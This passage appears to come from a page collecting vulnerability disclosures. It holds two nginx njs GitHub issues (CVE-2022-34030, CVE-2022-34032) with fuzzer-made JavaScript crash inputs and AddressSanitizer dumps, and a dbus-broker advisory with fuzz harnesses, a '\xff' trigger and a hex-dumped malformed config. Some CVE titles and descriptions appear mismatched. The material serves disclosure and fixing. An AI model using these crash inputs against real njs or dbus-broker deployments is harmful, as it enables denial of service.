    var v11 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v13 = [v11,1050462187];
    var v15 = v11.__proto__;
    function v16(v17,v18,v19,...v20) {
        var v21 = [v17,-1000000000000.0];
        function v22(v23,v24,v25,...v26) {
            var v27 = {"d":v22};
            var v28 = Object.defineProperty(v15,v18,v27);
        }
        var v30 = v21["find"](v22);
    }
    var v32 = v13["find"](v16);
    var v34 = v6.__proto__;
    function v35(v36,v37,v38,...v39) {
        'use strict';
        var v40 = [v36,-1000000000000.0];
        var v42 = 471270.459031428 in v39;
        var v43 = 1000.0;
        var v45 = String.fromCodePoint();
        var v46 = -128;
        var v50 = `YVySS90U8G${v45}string${-452883207}-2${Uint8Array}dotAll`.indexOf();
        var v51 = 50691;
        var v52 = 658545.3967616097;
        var v53 = undefined;
        var v54 = -1.7976931348623157e+308;
        var v55 = 2147483647;
        var v56 = 4184750072;
        var v57 = "toString";
        var v58 = Float64Array;
        var v59 = "a";
        var v60 = 54444;
        var v61 = ["c14RHVOudV",1050462187];
        function v62(v63,v64,v65,...v66) {
            var v68 = v34["shift"]();
        }
        var v70 = v61["find"](v62);
        function v71(v72,v73,v74,...v75) {
            'use strict';
            var v76 = {"get":v71};
            var v77 = Object.defineProperty(v34,35017,v76);
        }
        var v79 = v40["find"](v71);
    }
    var v81 = v8["find"](v35);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2802==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e312b bp 0x7ffca2668c70 sp 0x7ffca2668c40 T0)
    ==2802==The signal is caused by a READ memory access.
    ==2802==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4e312b in njs_djb_hash /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16
        #1 0x4f10cb in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:618:32
        #2 0x502d6a in njs_vmcode_property_in /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1431:11
        #3 0x502d6a in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:492:23
        #4 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #5 0x573a55 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #6 0x573a55 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #7 0x560b05 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #8 0x560b05 in njs_array_iterator_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:1918:12
        #9 0x560b05 in njs_array_handler_find /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2025:11
        #10 0x65b9ea in njs_object_iterate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_iterator.c
        #11 0x554e0f in njs_array_prototype_iterator /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2297:11
        #12 0x57599e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:739:11
        #13 0x573d0c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:777:16
        #14 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573d3f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #17 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f1db1e4a082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 in njs_djb_hash
    ==2802==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34030: SEGV src/njs_djb_hash.c:21:16 in njs_djb_hash · Issue #540 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

Jun 1, 2022

· 0 comments

**Comments**

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 9159992D-C762-4DEB-8981-8A3357935A7A
    function placeholder(){}
    function main() {
    var v2 = [];
    var v4 = {"get":Number};
    var v6 = Object.defineProperty(v2,29425,v4);
    var v7 = AggregateError(v6);
    Object.e = v7;
    var v9 = Promise();
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==8116==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004eed5c bp 0x7ffcc19b6310 sp 0x7ffcc19b61e0 T0)
    ==8116==The signal is caused by a READ memory access.
    ==8116==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4eed5c in njs_value_own_enumerate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21
        #1 0x53a37f in njs_object_traverse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1230:23
        #2 0x5a16ed in njs_builtin_match_native_function /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_builtin.c:776:11
        #3 0x592ad4 in njs_add_backtrace_entry /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:1308:15
        #4 0x592ad4 in njs_error_stack_new /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:102:16
        #5 0x592ad4 in njs_error_stack_attach /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:161:11
        #6 0x50506e in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1007:16
        #7 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #8 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #10 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #11 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #12 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #13 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #14 0x7f0a16923082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #15 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21 in njs_value_own_enumerate
    ==8116==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

2 participants

CVE-2022-34032: SEGV src/njs_value.c:240:21 in njs_value_own_enumerate · Issue #524 · nginx/njs

An issue was discovered in dbus-broker before 31. Multiple NULL pointer dereferences can be found when supplying a malformed XML config file.

Multiple memory corruption vulnerabilities were identified in dbus-broker, the standard dbus implementation for Fedora-based systems. Supplying malformed service or config files will cause the dbus-broker to crash or to overread memory boundaries.

**Vendor description**

_"The dbus-broker project is an implementation of a message bus as defined by the D-Bus specification. Its aim is to provide high performance and reliability, while keeping compatibility to the D-Bus reference implementation.It is exclusively written for Linux systems, and makes use of many modern features provided by recent linux kernel releases."_ 

Source: https://github.com/bus1/dbus-broker

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

**Vulnerability overview/description****1) Stack-Buffer Over-Read (CVE-2022-31212) **

Dbus-Broker depends on c-uitl/c-shquote to parse DBus service's Exec line. c-shquote contains a stack buffer over-read if a malicious Exec line is supplied. 

**2) Null Pointer Dereference (CVE-2022-31213) **

Multiple Null Pointer references can be found when supplying a malformed XML config file. 

**Proof of concept****1) Stack-Buffer Over-Read (CVE-2022-31212) **

Following harness was used to fuzz the function **c\_shquote\_parse\_argv()** as it is used in **src/launch/launcher.c of dbus-broker.** 

    #include <sys/types.h> 
    #include <unistd.h> 
    #include <stdio.h> 
    #include <string.h> 
    #include "c-shquote.h" 
    
    #define SIZE_65KB 66560 
    
    int main(int argc, char** argv) { 
      char fuzz_buf[SIZE_65KB] = ""; 
      ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB); 
      char **out_argv; 
      ssize_t out_argc; 
      c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf)); 
      return 0; 
    } 

Passing \\xff to the STDIN of the testharness will cause following crash: 

    ==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff98c675bf at pc 
    0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488 
    READ of size 1 at 0x7fff98c675bf thread T0 
    #0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21 
    #1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31 
    #2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21 
    #3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2 
    #4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24) 
    #5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d) 
    Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame 
    #0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102 
    This frame has 1 object(s): 
    [32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variable 
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, 
    swapcontext or vfork 
    (longjmp and C++ exceptions *are* supported) 
    SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 in 
    c_shquote_strncspn 
    Shadow bytes around the buggy address: 
    0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 
    0x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    =>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3 
    0x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 
    0x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 00 
    0x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    0x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 
    Shadow byte legend (one shadow byte represents 8 application bytes): 
    Addressable: 00 
    Partially addressable: 01 02 03 04 05 06 07 
    Heap left redzone: fa 
    Freed heap region: fd 
    Stack left redzone: f1 
    Stack mid redzone: f2 
    Stack right redzone:f3 
    Stack after return:  f5 
    Stack use after scope: f8 
    Global redzone: f9 
    Global init order: f6 
    Poisoned by user: f7 
    Container overflow: fc 
    Array cookie: ac 
    Intra object redzone: bb 
    ASan internal: fe 
    Left alloca redzone: ca 
    Right alloca redzone: cb 
    ==21744==ABORTING 

The error occurs in the functions  **c\_shquote\_strnspn() and c\_shquote\_strncspn().** 

Both allocate a buffer like this: 

    bool buffer[UCHAR_MAX] = {}; 

UCHAR\_MAX is defined in the C standard header limits.h and equals 255. Thus, array indexes of 0-254 can be addressed. 

However, the buffer will then be accessed like this:   

**buffer\[(unsigned char)string\[i\]\],** where string is the commandline from STDIN (or the EXEC line in case of dbus-broker services). 

Passing **\\xff** will thus read an out of bounds array element. 

**2) Null Pointer Dereference (CVE-2022-31213) **

The dbus-broker config parser uses the expat library to parse XML files. 

**<limit name="max\_pendingonment"/>** is a valid XML line. Thus expat will parse it correctly. As no value is supplied in the statement, the limit\_max\_pendingonment parameter will contain a Null pointer. DBus-broker does not validate the result and tries to dereference the field, causing a crash. Multiple other XML edge case can be found that cause the expat library to correctly return a Null pointer, but are not handled correctly by the dbus-broker. 

Including **<limit name="max\_pendingonment"/>**  causes following error message: 

    Program received signal SIGSEGV, Segmentation fault. 
    0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 
    Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid- 
    2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1- 
    28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32- 
    2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64 
    (gdb) bt 
    #0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 
    #1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at 
    ../src/util/string.c:42 
    #2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c 
    "limit") at ../src/launch/config.c:1140 
    #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 
    #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 
    #5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 
    #6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0, 
    node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1289 
    #7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28, 
    path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1347 
    #8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at 
    ../src/launch/harness-config.c:24 

Following harness was used: 

    #include <c-list.h> 
    #include <c-stdaux.h> 
    #include <stdlib.h> 
    #include "launch/config.h" 
    #include "launch/nss-cache.h" 
    #include "util/dirwatch.h" 
    
    int main(int argc, char **argv) { 
    _c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser); 
    _c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL; 
    _c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT; 
    _c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL; 
    int r; 
    r = dirwatch_new(&dirwatch); 
    config_parser_init(&parser); 
    r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch); 
    return 0; 
    } 

Following config file will cause another error: 

    00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354  ..<!DOCT 
    00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f  YPE g PUBLIC "-/ 
    00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363  N". "htt">.<busc 
    00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73  onfig>.. <type>s 
    00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a  d</type><fork/>. 
    00000050: 203c 7374 616e 6461 7264 5f73 7973 e803   <standard_sys.. 
    00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a  m_servicedirs/>. 
    00000070: 203c 7365 7276 6963 6564 6972 2072 6563   <servicedir rec 
    00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72  eive_type="error 
    00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569  "/>.<allow recei 
    000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22  ve_type="signal" 
    000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64  />-> <allow send 
    000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a  _destination="". 
    000000d0: 2020 2073 656e 645f 696e 7465 7266 6163     send_interfac 
    000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073  e="" />.<allow s 
    000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d  end_destina}ion= 
    00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572  "".   send_inter 
    00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d  face="ore"/> <!- 
    00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64  - --> <deny send 
    00000130: 5f64 6573 74                             _dest 

The error is following: 

    id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 
    Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2-- 
    /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8: 
    standard_sysm_servicedirs 
    Unknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2-- 
    /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9: 
    receive_type="error" 
    Program received signal SIGSEGV, Segmentation fault. 
    0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 
    #0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 
    #1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6 
    #2 0x0000000000408e96 in config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c 
    "servicedir") at ../src/launch/config.c:1130 
    #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 
    #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 
    #5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1 
    #6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1 
    #7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 
    #8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0, 
    node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1289 
    #9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18, 
    path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at 
    ../src/launch/config.c:1347 
    #10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at 
    ../src/launch/harness-config.c:24 

**Vulnerable / tested versions**

The Git Master branch (dbus-broker-29) has been tested and found to be vulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732). 

Furthermore, it also contains the vulnerable c-shquote library (tested at commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d). 

**Vendor contact timeline**

Tag

#c++